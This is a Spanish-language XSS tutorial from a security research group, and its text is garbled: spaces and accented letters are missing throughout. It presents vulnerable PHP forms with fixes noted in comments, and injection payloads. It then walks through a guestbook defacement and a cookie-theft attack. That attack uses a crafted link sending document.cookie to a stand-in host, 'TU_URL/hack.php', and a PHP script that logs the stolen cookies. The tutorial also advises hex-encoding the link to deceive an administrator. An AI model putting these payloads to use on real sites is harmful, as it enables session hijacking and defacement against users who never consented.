http://www.soulblack.com.

arSecurityResearch

XSS
CROSSSITESCRIPTING

Chebyte
chebyteatgmail.com

http://www.soulblack.com.arSecurityResearch

Conceptos XSS:(CrossSiteScripting)tipodevulnerabilidadsurgidacomo
consecuenciadeerroresdefiltradodelasentradasdelusuarioen aplicacionesweb. Setratadeusardiversastcnicasparainyectarcdigodemarcas (html),cdigoejecutableenlamquinacliente (Javascript/VBScript/ActiveX)ocdigoejecutableenelservidor (PHP/ASP)enlasentradasdeaplicacioneswebconelfinde conseguirmuydiversosobjetivoslimitadosporlacapacidaddel lenguajeinyectadoparavulneraralclienteoalservidordela aplicacinweb.

Inyeccin:Terminoreferentealainsercindealgntipode
cdigo.

Cookies:Unacookie(eningls,galleta)esunfragmentode
informacinquesealmacenaeneldiscodurodelvisitantedeuna pginawebatravsdesunavegador,apeticindelservidordela pgina.Estainformacinpuedeserluegorecuperadaporelservidor enposterioresvisitas

Webapp:Terminoabreviadodeaplicacionesweb.

http://www.soulblack.com.arSecurityResearch

Xss,esunatcnicabastantepopularenestosdias.Sibiensu amenazanovadirigidaalosservidores,sinomasbienalosusuarios ysitios,deloscualessepodraobtenerdatosmedianteing.social, hacerdefacessimples,etc. Enestearticulonosvamosabasarsoloenejemplosyaqueesta tcnicaensi,nocontienemuchateora.

http://www.soulblack.com.arSecurityResearch

Ejemplos
Ejemplo1

ejemplo1.php
<html> <body> <h1>Ejemplo 1</h1> <form action='ejemplo1-2.php' method='post'> <center><h1><b>Elige tu sistema favorito</b></h1></center><br> <input type="radio" name="os" value="Linux">Linux<br> <input type="radio" name="os" value="WIndoz">Windoz<br> <input type="radio" name="os" value="MacOS">MacOs<br> <center><input type="submit" value="send"></center> </form> </body> </html>

http://www.soulblack.com.arSecurityResearch

ejemplo12.php
<? $Choice = $_REQUEST[os]; //Solucion: $Choice = htmlentities($_REQUEST[os]); ?> <html> <head><TITLE>Ejemplo1</TITLE></head> <body> <br> <center> <h1>Elegiste: <? echo $Choice?></h1> </center> </body> </html>

Enelejemplo1.phpsepresentaunaencuesta,luegodeseleccionar algunaopcin,losdatossonenviadosalapginaejemplo1 2.php,endondeselosimprime. EstesimpleejemplopermiteinyectarcdigoXSS,debidoaquela variablenoestfiltrada,unejemplodeinyeccinpodraser: http://victima.com/ejemplo1.2.php?os=<script>alert('CheByte') </script>

http://www.soulblack.com.arSecurityResearch

Ejemplo2
ejemplo2.php
<hmtl> <body> <b>Ejemplo 2</b> <br> <form action='./ejemplo2.php' method='post'> URL de la imagen: <input type='text' name='url'value='http://' length='50'><br> <input type='submit'> </form> <? if(!empty($submit)){ //Solucion: $url=addslashes($url); echo "<img src=\"$url\">\n"; } ?> </body> </hmtl>

Esteejemplopermiteingresarunaimagen,dondeluegosela mostrar. Comoenesteejemplotampocosehaceunfiltrodeloqueseingresa podramoshacerlassiguientesinyecciones.

Enelcampodeurlsepodrainyectar:
http://victima.com/hola.jpg>"<script>alert('CheByte')</script>

http://www.soulblack.com.arSecurityResearch

Otratipodeinyecinquepodriamosingresarenelboxdeurl
http://viticma.com/hola.jpg>"<script>document.cookie</script>

Unasdelaswebappsmasvulnerablesaestetipodeataques sonlosguestbook,lacuallamayoranorealizacontrolesde datos,permitiendohacerunsimpledefaceingresandocdigo html,yaquelosdatossonalmacenadosenunabasede datos.

Estedefaceselopodrarealizarinyectandoenlafirmadentrodel guestbook
<iframe src=http://Tu_pagina/hack.php>

elcdigodehack.phppodratenerlaforma
<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT> <!-if (top.frames.length!=0) top.location=self.document.location; // --> </SCRIPT> BY CHEBYTE

Estoocasionaraquecadavesqueseingresealguestbook,seabra lapginahack.phpcomoframesuperiorconeltextoBYCHEBYTE.

http://www.soulblack.com.arSecurityResearch

Conestatcnicatambinsepuedeobtenerdatosdelusuario comoserlascookies. Acontinuacinvamosaverunejemplodecomoobtenerlas.

SupongamosqueencontramosunafalladeXSSenelsitioxxxx.com. Conseguimoselemaildeladministradorodealgunuseryle podramosenviarelsiguientelink.
http://xxxx.com/gnusoft/images/Windows.gif name="hia" onload="hia.src='http://TU_URL/hack.php?cookie='% 20+document.cookie;">

Dondeelcdigodehack.phpseria:
<? $cookie = $_REQUEST[cookie]; $file=fopen("cookies.txt", "a"); fput($file, "$cookie\n"); fclose($file); ?>

Elusuarioalentraraeselink,envaautomticamentesuscookiesa nuestropginahack.php,dondesonalmacenadasenelfichero cookies.txt. Parahacerunpocomasrealistayaumentarladificultaddelengao sepodracamuflarelcdigoxssdelaurltransformndolaa hexadecimal.

http://www.soulblack.com.arSecurityResearch |Smbolo Cdigo|hexa-decimal| |!|%21| |"|%22| |#|%23| |$|%24| |%|%25| |&|%26| |'|%27| |(|%28| |)|%29| |*|%2A| |+|%2B| |,|%2C| |-|%2D| |.|%2E| |/|%2F| |:|%3A| |;|%3B| |<|%3C| |=|%3D| |>|%3E| |?|%3F| |@|%40| |[|%5B| |\|%5C| |]|%5D| |^|%5E| |_|%5F|